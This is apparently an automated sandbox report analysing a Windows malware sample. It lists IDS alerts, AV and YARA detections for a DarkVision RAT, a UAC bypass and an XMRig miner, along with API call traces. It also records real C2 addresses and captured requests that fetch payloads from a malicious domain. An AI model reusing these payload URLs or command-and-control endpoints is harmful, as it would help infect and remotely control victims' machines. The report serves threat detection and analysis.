                    2024-12-09T07:37:30.470669+010020283713Unknown Traffic192.168.2.449737154.216.20.243443TCP
                    2024-12-09T07:38:05.335051+010020283713Unknown Traffic192.168.2.449740154.216.20.243443TCP
                    2024-12-09T07:38:29.876691+010020283713Unknown Traffic192.168.2.449764154.216.20.243443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:31.145554+010020224821A Network Trojan was detected192.168.2.449737154.216.20.243443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:31.426940+010020219541A Network Trojan was detected154.216.20.243443192.168.2.449737TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:29.989191+010020456181A Network Trojan was detected192.168.2.449739185.157.162.2165200TCP
                    2024-12-09T07:37:35.410820+010020456181A Network Trojan was detected192.168.2.449741185.157.162.2165200TCP
                    2024-12-09T07:37:38.092973+010020456181A Network Trojan was detected192.168.2.449744185.157.162.2165200TCP
                    2024-12-09T07:37:40.827923+010020456181A Network Trojan was detected192.168.2.449745185.157.162.2165200TCP
                    2024-12-09T07:37:43.495962+010020456181A Network Trojan was detected192.168.2.449746185.157.162.2165200TCP
                    2024-12-09T07:37:46.191236+010020456181A Network Trojan was detected192.168.2.449747185.157.162.2165200TCP
                    2024-12-09T07:38:41.565655+010020456181A Network Trojan was detected192.168.2.449848185.157.162.2165200TCP
                    2024-12-09T07:38:46.992724+010020456181A Network Trojan was detected192.168.2.449863185.157.162.2165200TCP
                    2024-12-09T07:38:49.693183+010020456181A Network Trojan was detected192.168.2.449870185.157.162.2165200TCP
                    2024-12-09T07:38:52.366437+010020456181A Network Trojan was detected192.168.2.449876185.157.162.2165200TCP
                    2024-12-09T07:38:55.065857+010020456181A Network Trojan was detected192.168.2.449883185.157.162.2165200TCP
                    2024-12-09T07:38:57.772811+010020456181A Network Trojan was detected192.168.2.449892185.157.162.2165200TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-09T07:37:33.710760+010020456191A Network Trojan was detected192.168.2.449739185.157.162.2165200TCP
                    2024-12-09T07:38:45.306325+010020456191A Network Trojan was detected192.168.2.449848185.157.162.2165200TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://woo097878781.win/WindosCPUsystem.exeAvira URL Cloud: Label: malware
                    Source: https://woo097878781.win/upload.phpAvira URL Cloud: Label: malware
                    Source: https://woo097878781.win:443/upload.phpAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 16.2.explorer.exe.e00000.0.unpackMalware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
                    Multi AV Scanner detection for domain / URL
                    Source: woo097878781.winVirustotal: Detection: 11%Perma Link
                    Source: https://woo097878781.win/downloaded_file.binVirustotal: Detection: 6%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeReversingLabs: Detection: 83%
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 34%
                    Source: file.exeVirustotal: Detection: 44%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031C031 CryptReleaseContext,CryptDestroyHash,13_2_0031C031
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031C00C CryptReleaseContext,CryptDestroyHash,13_2_0031C00C
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00305140 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,__snwprintf,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,13_2_00305140
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031BF00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,13_2_0031BF00
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031BFB6 CryptReleaseContext,CryptDestroyHash,13_2_0031BFB6
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031BFD9 CryptReleaseContext,CryptDestroyHash,13_2_0031BFD9
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1DAD0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,16_2_00E1DAD0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E053B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,16_2_00E053B0
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1DBEE CryptReleaseContext,CryptDestroyHash,16_2_00E1DBEE
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1DBC7 CryptReleaseContext,CryptDestroyHash,16_2_00E1DBC7
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1DC5F CryptReleaseContext,CryptDestroyHash,16_2_00E1DC5F
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E1DC2A CryptReleaseContext,CryptDestroyHash,16_2_00E1DC2A
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C52D0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C6640
                    Source: C:\Windows\explorer.exeCode function: 18_2_022CA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022CA4A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9AC0 CryptBinaryToStringW,RegGetValueW,18_2_022C9AC0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,18_2_022C9BF0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C49D0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,18_2_022C6E70
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C4FD0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C4CD0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,18_2_022C9D30
                    Source: C:\Windows\explorer.exeCode function: 18_2_022CA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,18_2_022CA7A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C55D0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9E27 CryptReleaseContext,CryptDestroyHash,18_2_022C9E27
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C5E10
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C3E70 CryptStringToBinaryA,18_2_022C3E70
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9E4E CryptReleaseContext,CryptDestroyHash,18_2_022C9E4E
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9EBF CryptReleaseContext,CryptDestroyHash,18_2_022C9EBF
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C9E8A CryptReleaseContext,CryptDestroyHash,18_2_022C9E8A

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

                    Bitcoin Miner

                    barindex
                    Yara detected Xmrig cryptocurrency miner
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1436, type: MEMORYSTR
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031CA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,13_2_0031CA90
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00313620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,13_2_00313620
                    Source: C:\Windows\explorer.exeCode function: 16_2_00E097F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,16_2_00E097F0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,18_2_022C7FB0
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmpJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49741 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49745 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49747 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49746 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49744 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49848 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49863 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49848 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49870 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49876 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49883 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49892 -> 185.157.162.216:5200
                    Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.4:49737 -> 154.216.20.243:443
                    Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.4:49737
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\explorer.exeNetwork Connect: 5.188.137.200 3333
                    Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443
                    Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333
                    Source: C:\Windows\explorer.exeNetwork Connect: 185.157.162.216 5200Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 185.157.162.216
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: global trafficTCP traffic: 192.168.2.4:49742 -> 37.203.243.102:3333
                    Source: global trafficTCP traffic: 192.168.2.4:49816 -> 5.188.137.200:3333
                    Source: Joe Sandbox ViewIP Address: 154.216.20.243 154.216.20.243
                    Source: Joe Sandbox ViewASN Name: SELECTEL-MSKRU SELECTEL-MSKRU
                    Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 154.216.20.243:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 154.216.20.243:443
                    Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:54892 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 154.216.20.243:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 154.216.20.243:443
                    Source: global trafficHTTP traffic detected: GET /downloaded_file.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: woo097878781.winConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: woo097878781.win
                    Source: global trafficHTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.216
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00321580 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,setsockopt,setsockopt,WSACreateEvent,WSAEventSelect,CloseHandle,shutdown,closesocket,WaitForMultipleObjects,WaitForSingleObject,WaitForSingleObject,WSAEnumNetworkEvents,shutdown,closesocket,CloseHandle,recv,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,WaitForSingleObject,shutdown,closesocket,CloseHandle,shutdown,closesocket,shutdown,closesocket,CloseHandle,shutdown,closesocket,LocalFree,13_2_00321580
                    Source: global trafficHTTP traffic detected: GET /downloaded_file.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: woo097878781.winConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: woo097878781.win
                    Source: global trafficHTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
                    Source: global trafficDNS traffic detected: DNS query: woo097878781.win
                    Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: powershell.exe, 00000007.00000002.1807555858.00000238530B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
